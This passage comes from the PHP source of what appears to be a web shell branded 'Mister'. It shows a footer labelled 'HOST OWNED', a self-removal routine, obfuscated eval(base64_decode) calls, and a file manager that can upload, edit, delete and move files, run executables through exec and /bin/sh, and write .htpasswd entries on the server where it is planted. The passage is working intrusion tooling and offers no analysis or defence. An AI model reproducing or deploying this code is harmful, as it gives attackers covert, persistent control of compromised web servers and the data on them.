  4084. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  4085. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4086. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  4087. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  4088. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  4089. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4090. $HOSTOWNED1 = "HOST OWNED :";
  4091. echo ''. $HOSTOWNED1 .'' ;
  4092. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  4093. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  4094. echo ''. $REPORTERROR .'</a></span></footer>';
  4095. echo ''. $THEEND .'' ;
  4096. exit ; }
  4097. ///// REMOVE SHELL
  4098. if ($_GET['Mister'] == 'kil') {
  4099. $FILE = $_SERVER['PHP_SELF'];
  4100. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  4101. header(' REFRESH: 0; '.$_SERVER['PHP_SELF'].''); } }
  4102. function DIRMISTER_K ($DIR) {}
  4103. HIDMISTER_K (); { MISTERMISTER_K ();}
  4104. ////// FILES
  4105. if ($_GET['Mister'] == 'FILES'){
  4106. function getlist ($DIRECTORY) {
  4107. global $delim, $WIN;
  4108. if ($d = @OPENDIR($DIRECTORY)) {
  4109. while (($FILENAME = @READDIR($d)) !== false) {
  4110. $path = $DIRECTORY . $FILENAME;
  4111. if ($stat = @lstat($path)) {
  4112.                 $FILE = array(
  4113.                     'FILENAME'    => $FILENAME,
  4114.                     'path'        => $path,
  4115.                     'IS_FILE'     => @IS_FILE($path),
  4116.                     'IS_DIR'      => @IS_DIR($path),
  4117.                     'IS_LINK'     => @IS_LINK($path),
  4118.                     'IS_READABLE' => @IS_READABLE($path),
  4119.                     'IS_WRITABLE' => @IS_WRITABLE($path),
  4120.                     'size'        => $stat['size'],
  4121.                     'MTIME'       => @fileMTIME($path),
  4122.                     'ATIME'       => @FILEATIME($path),
  4123.                     'CTIME'       => @FILECTIME($path));
  4124. if ($FILE['IS_DIR']) {
  4125. $FILE['IS_EXECUTABLE'] = @FILE_EXISTS($path . $delim . '.');
  4126. } else {
  4127. if (!$WIN) {
  4128. $FILE['IS_EXECUTABLE'] = @IS_EXECUTABLE($path);
  4129. } else {
  4130. $FILE['IS_EXECUTABLE'] = true;}}
  4131. if ($FILE['IS_LINK']) $FILE['target'] = @readlink($path);
  4132. if (function_exists('posix_getpwuid')) $FILE['owner_name'] = @RESET(posix_getpwuid($FILE['owner']));
  4133. if (function_exists('posix_getgrgid')) $FILE['group_name'] = @RESET(posix_getgrgid($FILE['group']));
  4134. $FILES[] = $FILE;}}
  4135. return $FILES;} else {
  4136. return false;}}
  4137. function sortlist (&$list, $key, $REVERSE) {
  4138. quicksort($list, 0, sizeof($list) - 1, $key);
  4139. if ($REVERSE) $list = array_reverse($list);}
  4140. function quicksort (&$array, $first, $last, $key) {
  4141. if ($first < $last) {
  4142.         $cmp = $array[floor(($first + $last) / 2)][$key];
  4143.         $l = $first;
  4144.         $r = $last;
  4145. while ($l <= $r) {
  4146. while ($array[$l][$key] < $cmp) $l++;
  4147. while ($array[$r][$key] > $cmp) $r--;
  4148. if ($l <= $r) {
  4149.                 $tmp = $array[$l];
  4150.                 $array[$l] = $array[$r];
  4151.                 $array[$r] = $tmp;
  4152.                 $l++;
  4153.                 $r--;}}
  4154.         quicksort($array, $first, $r, $key);
  4155.         quicksort($array, $l, $last, $key);}}
  4156. //////// EXTENSION
  4157. //// NUL : function is_script ($FILENAME) {
  4158. //// NUL : return ereg('\.php$|\.html$|\.py$|\.pl$|\.js$|\.css$|\.ini$|\.php.xjpg$|\.php.leet$|\.xml$', $FILENAME);}
  4159. //////// EXTENSION 2
  4160. function getmimetype ($FILENAME) {
  4161. static $mimes = array(
  4162.         '\.jpg$|\.jpeg$'  => 'image/jpeg',
  4163.         '\.gif$'          => 'image/gif',
  4164.         '\.png$'          => 'image/png',
  4165.         '\.php$'          => 'text/php',
  4166.         '\.php.xjpg$'     => 'image/php.xjpg',
  4167.         '\.php.xjpg$'     => 'application/php.xjpg',
  4168.         '\.php.xjpg$'     => 'text/php.xjpg',
  4169.         '\.html$'         => 'text/html',
  4170.         '\.txt$|\.asc$'   => 'text/plain',
  4171.         '\.xml$|\.xsl$'   => 'application/xml',
  4172.         '\.pdf$'          => 'application/pdf',
  4173.         '\.pphp$'         => 'application/pphp',
  4174.         '\.php$'          => 'application/php',
  4175.         '\.icon$'         => 'application/icon',
  4176.         '\.leet$'         => 'application/leet',
  4177.         '\.py$'           => 'application/py',
  4178.         '\.pl$'           => 'application/pl',
  4179.         '\.exe$'          => 'application/exe',);
  4180. ///// FUNCTIONS FILE MANAGER
  4181. foreach ($mimes as $regex => $mime) {
  4182. if (eregi($regex, $FILENAME)) return $mime;}
  4183. return 'text/plain';}
  4184. function del ($FILE) {
  4185. global $delim;
  4186. if (!@IS_LINK($FILE) && !FILE_EXISTS($FILE)) return false;
  4187. if (!@IS_LINK($FILE) && @IS_DIR($FILE)) {
  4188. if ($DIR = @OPENDIR($FILE)) {
  4189. $error = false;
  4190. while (($f = READDIR($DIR)) !== false) {
  4191. if ($f != '.' && $f != '..' && !del($FILE . $delim . $f)) {
  4192.                     $error = true;}}
  4193. closeDIR($DIR);
  4194. if (!$error) return @rmDIR($FILE);
  4195. return !$error;
  4196.     } else { return false;}
  4197.     } else { return @unlink($FILE);}}
  4198. function addslash ($DIRECTORY) {
  4199. global $delim;
  4200. if (substr($DIRECTORY, -1, 1) != $delim) {
  4201.         return $DIRECTORY . $delim;
  4202. } else {  return $DIRECTORY;}}
  4203. function RELATIVE2ABSOLUTE ($string, $DIRECTORY) {
  4204. if (path_is_relative($string)) {
  4205. return simplify_path(addslash($DIRECTORY) . $string);
  4206.     } else { return simplify_path($string);}}
  4207. function path_is_relative ($path) {
  4208.     global $WIN;
  4209. if ($WIN) { return (substr($path, 1, 1) != ':'); } else {
  4210.         return (substr($path, 0, 1) != '/');}}
  4211. function absolute2relative ($DIRECTORY, $target) {
  4212.     global $delim;
  4213.     $path = '';
  4214.     while ($DIRECTORY != $target) {
  4215. if ($DIRECTORY == substr($target, 0, strlen($DIRECTORY))) {
  4216.             $path .= substr($target, strlen($DIRECTORY));
  4217.             break;
  4218.         } else {
  4219. $path .= '..' . $delim;
  4220. $DIRECTORY = substr($DIRECTORY, 0, strrpos(substr($DIRECTORY, 0, -1), $delim) + 1);}}
  4221. if ($path == '') $path = '.';
  4222. return $path;}
  4223. function simplify_path ($path) {
  4224. global $delim;
  4225. if (@FILE_EXISTS($path) && function_exists('realpath') && @realpath($path) != '') {
  4226.         $path = realpath($path);
  4227. if (@IS_DIR($path)) {
  4228.             return addslash($path);
  4229.         } else {
  4230.         return $path;}}
  4231.     $pattern  = $delim . '.' . $delim;
  4232. if (@IS_DIR($path)) {
  4233.         $path = addslash($path);}
  4234. while (strpos($path, $pattern) !== false) {
  4235.         $path = str_replace($pattern, $delim, $path);}
  4236.     $e = addslashes($delim);
  4237.     $regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
  4238. while (ereg($regex, $path)) {
  4239.         $path = ereg_replace($regex, $delim, $path);}
  4240. return $path;}
  4241. function human_FILESIZE ($FILESIZE) {
  4242.     $suffices = 'kMGTPE'; $n = 0;
  4243. while ($FILESIZE >= 1000) {
  4244.         $FILESIZE /= 1024;
  4245.         $n++;}
  4246. $FILESIZE = round($FILESIZE, 3 - strpos($FILESIZE, '.'));
  4247. if (strpos($FILESIZE, '.') !== false) {
  4248. while (in_array(substr($FILESIZE, -1, 1), array('0', '.'))) {
  4249.             $FILESIZE = substr($FILESIZE, 0, strlen($FILESIZE) - 1); } }
  4250. $suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
  4251. return $FILESIZE . " {$suffix}B";}
  4252. function strip (&$str) {
  4253. $str = stripslashes($str);}
  4254. //////// LISTING PAGE
  4255. function LISTING_PAGE ($MESSAGE = null) {
  4256. global $self, $DIRECTORY, $SORT, $REVERSE;
  4257.     HTML_HEADER();
  4258.     $list = getlist($DIRECTORY);
  4259. if (array_key_exists('sort', $_GET)) $SORT = $_GET['sort']; else $SORT = 'FILENAME';
  4260. if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true')
  4261. $REVERSE = true; else $REVERSE = false; sortlist($list, $SORT, $REVERSE);
  4262. echo "<div class='content'>";
  4263. echo '<table  cellpadding=0 cellspacing=1 style="width:100%;">';
  4264. echo '<form enctype="multipart/form-data" action="' . $self . '?Mister=FILES" method="post">';
  4265.     DIRECTORY_CHOICE();
  4266. if (!empty($MESSAGE)) {
  4267.         spacer();
  4268. echo $MESSAGE;}
  4269. if (@IS_WRITABLE($DIRECTORY)) {
  4270.         CREATE_BOX();
  4271.         UPLOAD_BOX();
  4272. } else { spacer();}
  4273. if ($list) { listing($list);
  4274. } else {
  4275. echo error('NOT_READABLE', $DIRECTORY);}
  4276. echo '</table></form></div>';
  4277.     HTML_FOOTER();}
  4278. function DIRECTORY_CHOICE () {
  4279. global $DIRECTORY, $HOMEDIR, $COLS, $self;
  4280. ///////////// DIRECTORY
  4281. echo '<tr>'; echo '<td style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" colspan="' . $COLS . '" id="DIRECTORY">'; echo '<b> &check; <a href="' . $self . '?Mister=FILES&DIR=' . urlencode($HOMEDIR) . '">' . word('DIRECTORY') . '</a> : </b>'; echo '<input type="text" name="DIR" size="' . textfieldsize($DIRECTORY) . '" value="' . html($DIRECTORY) . '" ONFOCUS="activate(\'DIRECTORY\')" style="width:50%">'; echo '<input type="submit" class="Mister-button" name="CHANGEDIR" value="' . word('CHANGE') . '" ONFOCUS="activate(\'DIRECTORY\')"></td>';} echo '</tr>';
  4282. ///////////// CREAT
  4283. function CREATE_BOX () {
  4284. global $COLS;
  4285. echo '<tr>'; echo '<td colspan="' . $COLS . '" id="CREATE" style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" >'; echo '<b>&check; MAKE NEW : </b>'; echo '<select name="CREATE_type"  ONFOCUS="activate(\'CREATE\')">'; echo '<option value="FILE">' . word('FILE') . '</option>'; echo '<option value="DIRECTORY">' . word('DIRECTORY') . '</option>'; echo '</select>'; echo '<input type="text" name="CREATE_NAME" ONFOCUS="activate(\'CREATE\')" / style="width:40%">'; echo '<input type="submit" class="Mister-button" name="SUBMIT_CREATE" value="' . word('CREATE') . '" ONFOCUS="activate(\'CREATE\')" />'; echo '</td>';}
  4286. ///////////// UPLOAD
  4287. function UPLOAD_BOX () {
  4288. global $COLS;
  4289. echo '<tr>'; echo '<td style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" colspan="' . $COLS . '" id="UPLOAD" >'; echo '<b> &check; UPLOAD ' . word('FILE') . ' : </b>';
  4290. echo '<input type="FILE" name="UPLOAD" ONFOCUS="activate(\'other\')" style="width:40%;">'; echo '<input type="submit" class="Mister-button" name="SUBMIT_UPLOAD" value="' . word('UPLOAD') . '" ONFOCUS="activate(\'other\')">'; echo '</td></tr>';}
  4291. //////////
  4292. function listing ($list) {
  4293. global $DIRECTORY, $HOMEDIR, $SORT, $REVERSE, $WIN, $COLS, $DATE_FORMAT, $self;
  4294. echo '<tr><th style="width:1%;"></th>';
  4295. $d = 'Mister=FILES&DIR=' . urlencode($DIRECTORY) . '&amp;';
  4296. if (!$REVERSE && $SORT == 'FILENAME') $r = '&amp;reverse=true'; else $r = '';
  4297. echo "\t<th class=\"FILENAME\" style='width:40%;'>&check;
  4298. <a href=\"$self?{$d}sort=FILENAME$r\">" . word('FILENAME') . "</a></th>\n";
  4299. if (!$REVERSE && $SORT == 'size') $r = '&amp;reverse=true'; else $r = '';
  4300. echo "\t<th class=\"size\" style='width:10%;'>&check; <a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n</center>";
  4301. /////// LASTUPDATE
  4302. if (!$WIN) {}
  4303. echo '<th class="LASTUPDATE" style="width:10%;">&check; ' . word('LASTUPDATE') .''; echo"</th>\n";
  4304. /// PERMISSONS
  4305. if (!$WIN) {}
  4306. echo '<th class="PERMISSION" style="width:10%;">&check; ' . word('PERMISSION') .''; echo"</th>\n";
  4307. ///// DAYUPDATE
  4308. if (!$WIN) {}
  4309. echo '<th class="DAYUPDATE" style="width:10%;">&check; ' . word('DAYUPDATE') .''; echo"</th>\n";
  4310. ////// FUNCTIONS
  4311. if (!$WIN) {}
  4312. echo '<th class="FUNCTIONS" style="width:20%;">&check; ' . word('FUNCTIONS') .''; echo"</th>\n";
  4313. ////////    for ($i = 0; $i < sizeof($list); $i++) {
  4314.     for ($i = 0; $i < sizeof($list); $i++) {
  4315.         $FILE = $list[$i];
  4316.         $timestamps  = 'MTIME: ' . date($DATE_FORMAT, $FILE['MTIME']) . ', ';
  4317.         $timestamps .= 'ATIME: ' . date($DATE_FORMAT, $FILE['ATIME']) . ', ';
  4318.         $timestamps .= 'CTIME: ' . date($DATE_FORMAT, $FILE['CTIME']);
  4319. echo '<tr><td class="checkbox"><input type="checkbox" name="CHECKED' . $i . '" value="true" ONFOCUS="activate(\'other\')" />';
  4320. echo '</td><td class="FILENAME" title="' . html($timestamps) . '">';
  4321. if ($FILE['IS_LINK']) {
  4322. echo html($FILE['FILENAME']) . ' &rarr; ';
  4323. $REAL_FILE = RELATIVE2ABSOLUTE($FILE['target'], $DIRECTORY);
  4324. if (@IS_READABLE($REAL_FILE)) {
  4325. if (@IS_DIR($REAL_FILE)) {
  4326. echo '<a href="' . $self . '?Mister=FILES&DIR=' . urlencode($REAL_FILE) . '">' . html($FILE['target']) . '</a>';
  4327. } else {
  4328. echo '<a href="' . $self . '?Mister=FILES&ACTION=EDIT&amp;FILE=' . urlencode($REAL_FILE) . '">' . html($FILE['target']) . '</a>';} } else {
  4329. echo html($FILE['target']);}
  4330. } elseif ($FILE['IS_DIR']) {
  4331. $IMGFOLDERS = '<img src="">'; echo '<b>'; echo ''. $IMGFOLDERS .'</b>';
  4332. if ($WIN || $FILE['IS_EXECUTABLE']) {
  4333. echo '<b><a href="' . $self . '?Mister=FILES&DIR=' . urlencode($FILE['path']) . '">' . html($FILE['FILENAME']) . '</a></b>';} else {
  4334. echo html($FILE['FILENAME']);} } else {
  4335. if (substr($FILE['FILENAME'], 0, 1) == '.') {
  4336. echo ''; }
  4337. else {
  4338. echo ''; }
  4339. if ($FILE['IS_FILE'] && $FILE['IS_READABLE']) {
  4340. $IMGEDITED = '<img src="">'; echo ''. $IMGEDITED .'';
  4341. echo '<a href="' . $self . '?Mister=FILES&ACTION=EDIT&amp;FILE=' . urlencode($FILE['path']) . '">' . html($FILE['FILENAME']) . '</a>';}
  4342. else { echo html($FILE['FILENAME']); } }
  4343. if ($FILE['size'] >= 1000) {
  4344.             $human = ' title="' . human_FILESIZE($FILE['size']) . '"';}
  4345. else {$human = '';}
  4346. echo "\t<td class=\"size\"$human><center>{$FILE['size']} <font style=\"color:#0078FF\">KO</font></td>\n";
  4347. ///// LASTUPDATE
  4348. if (!$WIN) {}
  4349. echo '<td class="LASTUPDATE">';
  4350. echo "<center>";echo  date("d-M-Y H:i",@fileMTIME($FILE['path']));
  4351. //////// PERMISSION
  4352. if (!$WIN) {}
  4353. echo '<td class="PERMISSION">';
  4354. echo "<center>"; echo getFilePermissions($FILE['path']);
  4355. /////// DAYUPDATE
  4356. if (!$WIN) {}
  4357. echo '<td class="DAYUPDATE">';
  4358. echo "<center>";echo  date("l",@fileMTIME($FILE['path']));
  4359. ///// FUNCTIONS
  4360. if (!$WIN) {}
  4361. echo '<td class="FUNCTIONS">';
  4362. echo '<center><input type="hidden" name="FILE' . $i . '" value="' . html($FILE['path']) . '" />';
  4363. /// END
  4364.             $ACTIONS = array();
  4365. if (function_exists('SYMLINK')) {
  4366.             $ACTIONS[] = 'CREATE_SYMLINK';}
  4367. if (@IS_WRITABLE(DIRname($FILE['path']))) {
  4368.             $ACTIONS[] = 'DELETE';
  4369.             $ACTIONS[] = 'RENAME';
  4370.             $ACTIONS[] = 'MOVE';}
  4371. if ($FILE['IS_FILE'] && $FILE['IS_READABLE']) {
  4372.             $ACTIONS[] = 'COPY';
  4373. if ($FILE['IS_WRITABLE'])
  4374.             $ACTIONS[] = 'EDIT';
  4375.             $ACTIONS[] = 'DOWNLOAD';
  4376.             }
  4377. if (!$WIN && function_exists('exec') && $FILE['IS_FILE'] && $FILE['IS_EXECUTABLE'] && FILE_EXISTS('/bin/sh')) {
  4378.             $ACTIONS[] = 'EXECUTE';}
  4379. if (sizeof($ACTIONS) > 0) {
  4380. echo '<select name="ACTION' . $i . '">
  4381. <option value="">' . str_repeat('&nbsp;', 30) . '</option>';
  4382. foreach ($ACTIONS as $ACTION) {
  4383. echo "\t\t<option value=\"$ACTION\">" . word($ACTION) . "</option>\n";}
  4384. echo '</select><input class="Mister-button" type="submit" name="submit' . $i . '" value=" DONE " ONFOCUS="activate(\'other\')" />';}
  4385. echo '</td></tr>';}
  4386. echo '<tr></td><td colspan="' . ($COLS - 1) . '">';
  4387. echo '<input type="hidden" name="num" value="' . sizeof($list) . '" />';
  4388. echo '<input type="hidden" name="FOCUS" value="" />';
  4389. echo '<input type="hidden" name="OLDDIR" value="' . html($DIRECTORY) . '" /> <b> &check; FUNCTIONS FOR ALL : </b>';
  4390.              $ACTIONS = array();
  4391. if (@IS_WRITABLE(DIRname($FILE['path']))) {
  4392.              $ACTIONS[] = 'DELETE';
  4393.              $ACTIONS[] = 'MOVE';}
  4394.              $ACTIONS[] = 'COPY';
  4395. echo '<select name="ACTION_ALL">
  4396. <option value="">' . str_repeat('&nbsp;', 30) . '</option>';
  4397. foreach ($ACTIONS as $ACTION) {
  4398. echo "\t\t<option value=\"$ACTION\">" . word($ACTION) . "</option>\n";}
  4399. echo '</select><input class="Mister-button" type="submit" name="SUBMIT_ALL" value=" DONE " ONFOCUS="activate(\'other\')" />';
  4400. $MISTER23 = "</td></tr>"; echo ''. $MISTER23 .''; }
  4401. ///////////// EDITE
  4402. function EDIT ($FILE) {
  4403. global $self, $DIRECTORY, $editcols, $editrows, $APACHE, $HTPASSWD, $htaccess;
  4404.     HTML_HEADER();
  4405. echo'<h2 style="text-align: left; margin-bottom: 0"><b>'; eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/")); echo'<span style="color:#FFFFFF;"> CREAT & EDITE FILE : </b></span>'; echo'<center><input style="width:99%;" type="text"  value="' . html ($FILE) . '"></center>';  eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/")); echo'</b><span style="color:#FFFFFF;">LASTE UPDATE : </b><span> | '; echo  date("l",@fileMTIME($FILE)); echo' | '; echo  date("d-M-Y H:i",@fileMTIME($FILE)); echo'</h2>';
  4406. ////////////// $HTPASSWD
  4407. echo'<form action="' . $self . '?Mister=FILES" method="post">';
  4408. echo'<table class="dialog" >';
  4409. echo'<center><textarea style="width:99%;height:40%;"  name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
  4410. if (array_key_exists('content', $_POST)) {
  4411. echo $_POST['content'];} else {
  4412. $f = fopen($FILE, 'r');
  4413. while (!feof($f)) {
  4414. echo html(fread($f, 8192));}
  4415. fclose($f);}
  4416. if (!empty($_POST['user'])) {
  4417. echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);}
  4418. if (!empty($_POST['basic_auth'])) {
  4419. if ($WIN) { $AUTHFILE = str_replace('\\', '/', $DIRECTORY) . $HTPASSWD; }
  4420. else { $AUTHFILE = $DIRECTORY . $HTPASSWD;}
  4421. echo "\nAuthType Basic\nAuthName &quot;Restricted DIRECTORY&quot;\n";
  4422. echo 'AuthUserFILE &quot;' . html($AUTHFILE) . "&quot;\n";
  4423. echo 'Require valid-user';}
  4424. echo '</textarea></center>';
  4425. $FOTTER2 = "<footer class='MK-footer'>"; echo ''. $FOTTER2 .'|';
  4426. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  4427. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  4428. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4429. $SERVERIP1 = "SERVER IP :"; echo ''. $SERVERIP1 .'' ;
  4430. $SPAN2 = "<span style='color:#FFFFFF;'>";
  4431. $SPAN3 = "</span>"; echo ''. $SPAN2 .'' ;
  4432. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  4433. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4434. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  4435. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  4436. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  4437. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4438. $HOSTOWNED1 = "HOST OWNED :"; echo ''. $HOSTOWNED1 .'' ;
  4439. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  4440. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  4441. echo ''. $REPORTERROR .'</a></span></footer>';
  4442. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  4443. if ($APACHE && basename($FILE) == $HTPASSWD) {
  4444. echo '' . word('user') . ': <input type="text" name="user" />';
  4445. echo '' . word('password') . ': <input type="password" name="password" />';
  4446. echo '<input type="submit" value="' . word('add') . '" />';}
  4447. if ($APACHE && basename($FILE) == $htaccess) {
  4448. echo '<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />';}
  4449. echo '<input type="hidden" name="ACTION" value="EDIT" />';
  4450. echo '<input type="hidden" name="FILE" value="' . html($FILE) . '" />';
  4451. echo '<input type="hidden" name="DIR" value="' . html($DIRECTORY) . '" />';
  4452. echo '<input type="RESET" value="' . word('RESET') . '" class="Mister-button"/>';
  4453. echo '<input type="submit" name="SAVE" value="' . word('SAVE') . '" " style="margin-left:50px" class="Mister-button"/>';
  4454. echo '<a href="' . $self . '?Mister=FILES&DIR=' . urlencode($DIRECTORY) . '" style="margin-left:50px">[ ' . word('BACK') . ' ]</a>';
  4455. $MISTERKLIO22 = "</td></tr></table></form><br>";    echo ''. $MISTERKLIO22 .'';
  4456.     HTML_FOOTER(); }
  4457. function spacer () {
  4458. global $COLS;}
  4459. function textfieldsize ($content) {
  4460. $size = strlen($content) + 5;
  4461. if ($size < 30) $size = 30;
  4462. return $size;}
  4463. function REQUEST_DUMP () {
  4464. foreach ($_REQUEST as $key => $value) {
  4465. echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
  4466. }
  4467. }
  4468. function html ($string) {
  4469. global $charset;
  4470. return htmlentities($string, ENT_COMPAT, $charset);}
  4471. function word ($word) {
  4472. global $words, $WORD_CHARSET;
  4473. return htmlentities($words[$word], ENT_COMPAT, $WORD_CHARSET);}
  4474. function phrase ($phrase, $arguments) {
  4475. global $words;
  4476. static $search;
  4477. if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
  4478. for ($i = 0; $i < sizeof($arguments); $i++) {
  4479. $arguments[$i] = nl2br(html($arguments[$i]));}
  4480. $replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
  4481. return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));}
  4482. function getwords ($lang) {
  4483. global $WORD_CHARSET, $DATE_FORMAT;
  4484. switch ($lang) {
  4485. case 'en':
  4486.     default:
  4487.         $DATE_FORMAT = 'n/j/y H:i:s';
  4488.         $WORD_CHARSET = 'ISO-8859-1';
  4489. return array (
  4490. 'DOWNLOAD' => 'DOWNLOAD','CREATE_SYMLINK' => 'CREATE_SYMLINK','SYMLINK' => 'SYMLINK',
  4491. 'IS_WRITABLE' => 'IS_WRITABLE','NOT_READABLE' => 'NOT READABLE YOU DONT HAVE PERMISSION TO ACCES HERE',
  4492. 'IS_EXECUTABLE' => 'IS_EXECUTABLE','IS_FILE' => 'IS_FILE','DAYUPDATE' => 'DAYUPDATE','PERMISSION' => 'PERMISSION',
  4493. 'LASTUPDATE' => 'LASTUPDATE','DIRECTORY' => 'DIRECTORY','FILE' => 'FILE',
  4494. 'FILENAME' => 'FILENAME','size' => 'SIZE','FUNCTIONS' => 'FUNCTIONS',
  4495. 'EXECUTE' => 'EXECUTE','DELETE' => 'DELETE','RENAME' => 'RENAME',
  4496. 'MOVE' => 'MOVE','COPY' => 'COPY','EDIT' => 'EDIT','DOWNLOAD' => 'DOWNLOAD',
  4497. 'UPLOAD' => 'UPLOAD','CREATE' => 'CREATE','CHANGE' => 'CHANGE','SAVE' => 'SAVE',
  4498. 'SET' => 'SET','RESET' => 'RESET','YES' => 'YES','NO' => 'NO',
  4499. 'BACK' => 'BACK','DESTINATION' => 'DESTINATION','NO_OUTPUT' => 'NO OUTPUT',
  4500. 'UPLOADED' => '"[%1]" HAS BEEN UPLOADED.','NOT_UPLOADED' => '"[%1]" COULD NOT BE UPLOADED.',
  4501. 'ALREADY_EXISTS' => '"[%1]" ALREADY EXISTS.','CREATED' => '"[%1]" HAS BEEN CREATED.',
  4502. 'NOT_CREATED' => '"[%1]" COULD NOT BE CREATED.','REALLY_DELETE' => 'DELETE THESE FILES?',
  4503. 'DELETED' => "THESE FILES HAVE BEEN DELETED:\n[%1]",'NOT_DELETED' => "THESE FILES COULD NOT BE DELETED:\n[%1]",
  4504. 'RENAME_FILE' => 'RENAME FILE TO ? :','RENAMED' => '"[%1]" HAS BEEN RENAMED TO "[%2]".',
  4505. 'NOT_RENAMED' => '"[%1] COULD NOT BE RENAMED TO "[%2]".','MOVE_FILES' => 'MOVE THESE FILES :',
  4506. 'MOVED' => "THESE FILES HAVE BEEN MOVED TO \"[%2]\":\n[%1]",
  4507. 'NOT_MOVED' => "THESE FILES COULD NOT BE MOVED TO \"[%2]\":\n[%1]",
  4508. 'COPY_FILES' => 'COPY THESE FILES :','COPIED' => "THESE FILES HAVE BEEN COPIED TO \"[%2]\":\n[%1]",
  4509. 'NOT_COPIED' => "THESE FILES COULD NOT BE COPIED TO \"[%2]\":\n[%1]",
  4510. 'NOT_EDITED' => '"[%1]" CAN NOT BE EDITED.','SAVED' => '"[%1]" HAS BEEN SAVED.',
  4511. 'NOT_SAVED' => '"[%1]" COULD NOT BE SAVED.',
  4512. 'ZIP' => 'ZIP.',
  4513. 'CHMOD' => 'CHMOD.',
  4514.         );
  4515.     }
  4516. }
  4517. function getimage ($image) {}
  4518. function HTML_HEADER () {}
  4519. function HTML_FOOTER () {
  4520. echo '</span>'; echo ''. $THEEND .'';}
  4521. function NOTICE ($phrase) {
  4522. global $COLS; $args = func_get_args();
  4523. array_shift($args);
  4524. return '<th style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" colspan="' . $COLS . '">'. phrase($phrase, $args) . '</td>';}
  4525. function error ($phrase) {
  4526. global $COLS; $args = func_get_args();
  4527. array_shift($args);
  4528. return '<th style="background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);" colspan="' . $COLS . '">' . phrase($phrase, $args) . '</td></tr>';}
  4529. ////  $HOMEDIR = BACK './';
  4530. $HOMEDIR = './';
  4531. if (get_magic_quotes_gpc()) {
  4532.     array_walk($_GET, 'STRIP');
  4533.     array_walk($_POST, 'STRIP');
  4534.     array_walk($_REQUEST, 'STRIP');}
  4535. if (array_key_exists('image', $_GET)) { header('Content-Type: image/gif');
  4536.     die(getimage($_GET['image']));}
  4537. $delim = DIRECTORY_SEPARATOR;
  4538. if (function_exists('php_uname')) {
  4539.     $WIN = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;} else {
  4540.     $WIN = ($delim == '\\') ? true : false;}
  4541. if (!empty($_SERVER['PATH_TRANSLATED'])) {
